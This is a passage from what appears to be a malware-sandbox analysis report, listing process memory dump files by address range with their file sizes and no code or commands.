                                                              Filesize

                                                              120KB

                                                            • memory/5300-576-0x000000001EFB0000-0x000000001F172000-memory.dmp

                                                              Filesize

                                                              1.8MB

                                                            • memory/5300-577-0x000000001F6B0000-0x000000001FBD8000-memory.dmp

                                                              Filesize

                                                              5.2MB

                                                            • memory/5300-569-0x000000001E350000-0x000000001E45A000-memory.dmp

                                                              Filesize

                                                              1.0MB

                                                            • memory/5300-570-0x000000001B420000-0x000000001B432000-memory.dmp

                                                              Filesize

                                                              72KB

                                                            • memory/5300-571-0x000000001C2E0000-0x000000001C31C000-memory.dmp

                                                              Filesize

                                                              240KB

                                                            • memory/5300-483-0x00000000006D0000-0x0000000000790000-memory.dmp

                                                              Filesize

                                                              768KB

                                                            • memory/5300-572-0x000000001E660000-0x000000001E6D6000-memory.dmp

                                                              Filesize

                                                              472KB

                                                            • memory/5380-669-0x00000000000C0000-0x0000000000565000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/5380-657-0x00000000000C0000-0x0000000000565000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                            • memory/5540-291-0x0000021C7CD70000-0x0000021C7CD9A000-memory.dmp

                                                              Filesize

                                                              168KB

                                                            • memory/5540-309-0x0000021C7F1B0000-0x0000021C7F20E000-memory.dmp

                                                              Filesize

                                                              376KB

                                                            • memory/5648-399-0x0000020DD1B30000-0x0000020DD1B42000-memory.dmp

                                                              Filesize

                                                              72KB

                                                            • memory/5648-400-0x0000020DD17C0000-0x0000020DD17CA000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/5740-339-0x0000028CF5920000-0x0000028CF5A6E000-memory.dmp

                                                              Filesize

                                                              1.3MB

                                                            • memory/5740-332-0x0000028CF5180000-0x0000028CF51A2000-memory.dmp

                                                              Filesize

                                                              136KB

                                                            • memory/5952-340-0x0000000000400000-0x0000000000408000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/6052-441-0x0000000000400000-0x0000000000592000-memory.dmp

                                                              Filesize

                                                              1.6MB

                                                            • memory/6092-361-0x0000000000FC0000-0x0000000001043FAE-memory.dmp

                                                              Filesize

                                                              527KB

                                                            • memory/6120-359-0x0000000000400000-0x000000000045D000-memory.dmp

                                                              Filesize

                                                              372KB

                                                            • memory/6120-360-0x0000000000400000-0x000000000045D000-memory.dmp

                                                              Filesize

                                                              372KB